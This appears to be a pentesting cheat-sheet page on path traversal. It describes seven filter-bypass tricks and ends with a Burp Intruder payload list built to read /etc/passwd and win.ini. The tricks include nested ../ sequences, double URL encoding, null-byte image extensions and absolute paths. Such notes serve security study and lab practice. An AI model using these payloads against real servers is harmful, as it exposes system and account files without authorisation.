search

Path Traversal

  1. Application blocks traversal sequences but treats the supplied filename as being relative to a absolute path and can be exploit with /etc/passwdabsolute path to target file payload.

  2. Images on target is loaded using filename parameter, and is defending against traversal attacks by stripping path traversal. Exploit using ....//....//....//....//etc/passwd payloads.

  3. Superfluous URL-encoded ..%252f..%252f..%252fetc/passwd payload can bypass application security controls.

  4. Leading the beginning of the filename referenced with the original path and then appending /var/www/images/../../../etc/passwd payload at end bypasses the protection.

  5. Using a null byte character at end plus an image extension to fool APP controls that an image is requested, this ../../../etc/passwd%00.png payload succeed.

  6. Double URL encode file path traversal, as example this ../../../../../../../../../../etc/hostname will be URL double encoded as, %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fhostname.

  7. Windows OS accept both ../ and ..\ for directory traversal syntax, and as example retrieving loadImage?filename=..\..\..\windows\win.ini on windows target to identify valid path traversal.

Intruder payloads list:

/etc/passwd
....//....//....//....//etc/passwd
..%252f..%252f..%252fetc/passwd
/var/www/images/../../../etc/passwd
../../../etc/passwd%00.png
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

hashtag
Headers to bypass access to files

PreviousSSTINextFile Upload

Last updated